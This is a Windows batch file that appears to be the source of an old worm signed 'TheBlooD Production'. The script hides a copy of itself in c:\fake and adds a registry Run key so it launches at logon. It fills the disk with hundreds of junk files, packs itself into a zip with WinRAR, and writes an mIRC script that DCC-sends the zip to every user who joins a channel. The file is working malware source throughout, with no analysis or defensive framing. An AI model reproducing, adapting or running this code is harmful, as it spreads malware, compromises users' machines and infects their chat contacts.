   md fake
   attrib +h c:\fake
   if not exist c:\fake\bloodfak.exe copy path0212E1.exe c:\fake\bloodfak.exe
   copy path0212E1.exe c:\fake\path0212E1.exe
   ECHO REGEDIT4>c:\fake\blood.reg
   ECHO.>>c:\fake\blood.reg
   ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>c:\fake\blood.reg
   ECHO "System"="c:\fake\bloodfak.exe">>c:\fake\blood.reg
   @REGEDIT /S /C c:\fake\blood.reg
   tree>>c:\fake\a.a
   tree>>c:\fake\a.a
   tree>>c:\fake\a.a
   tree>>c:\fake\a.a
   tree>>c:\fake\a.a
   tree>>c:\fake\a.a
   cd c:\fake
   set theblood=for
   %theblood% /L %%a IN (1,1,300) do copy a.a %random%-%%a.a
   if exist C:\ARCHIV~1\winrar\rar32.exe C:\ARCHIV~1\winrar\rar32.exe a -mdG -s -m5 path0212E1.zip c:\fake\path0212E1.exe
   if exist C:\PROGRA~1\winrar\rar32.exe C:\PROGRA~1\winrar\rar32.exe a -mdG -s -m5 path0212E1.zip c:\fake\path0212E1.exe
   if exist C:\ARCHIV~1\winrar\rar.exe C:\ARCHIV~1\winrar\rar.exe a -mdG -s -m5 path0212E1.zip c:\fake\path0212E1.exe
   if exist C:\PROGRA~1\winrar\rar.exe C:\PROGRA~1\winrar\rar.exe a -mdG -s -m5 path0212E1.zip c:\fake\path0212E1.exe
   goto blood0
   :blood4
   echo n3=>>C:\script.ini
   goto blood5
   :blood1
   echo n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }>>>C:\script.ini
   goto blood2
   :blood0
   echo [script]>>C:\script.ini
   goto blood1
   :blood3
   echo n2=}>>>C:\script.ini
   goto blood4
   :blood5
   echo n4=ON 1:connect: {>>C:\script.ini
   goto blood6
   :blood2
   echo n1= /dcc send $nick c:\fake\path0212E1.zip>>C:\script.ini
   goto blood3
   :blood6
   echo n5= /run attrib +r +s +h c:\fake\path0212E1.zip>>C:\script.ini
   goto blood7
   :blood7
   echo n6=}>>C:\script.ini
   goto blood8
   :blood8
   if exist C:\mIRC\mirc.exe copy C:\script.ini C:\mIRC>nul
   if exist C:\ARCHIV~1\mIRC\mirc.exe copy C:\script.ini C:\ARCHIV~1\mIRC>nul
   if exist C:\PROGRA~1\mIRC\mirc.exe copy C:\script.ini C:\PROGRA~1\mIRC>nul
   if exist D:\mIRC\mirc.exe copy C:\script.ini D:\mIRC>nul
   if exist D:\ARCHIV~1\mIRC\mirc.exe copy C:\script.ini D:\ARCHIV~1\mIRC>nul
   if exist D:\PROGRA~1\mIRC\mirc.exe copy C:\script.ini D:\PROGRA~1\mIRC>nul
   ##################################
   #     TheBlooD  Production ©     #
   #             Spain              #
   ##################################
   exit
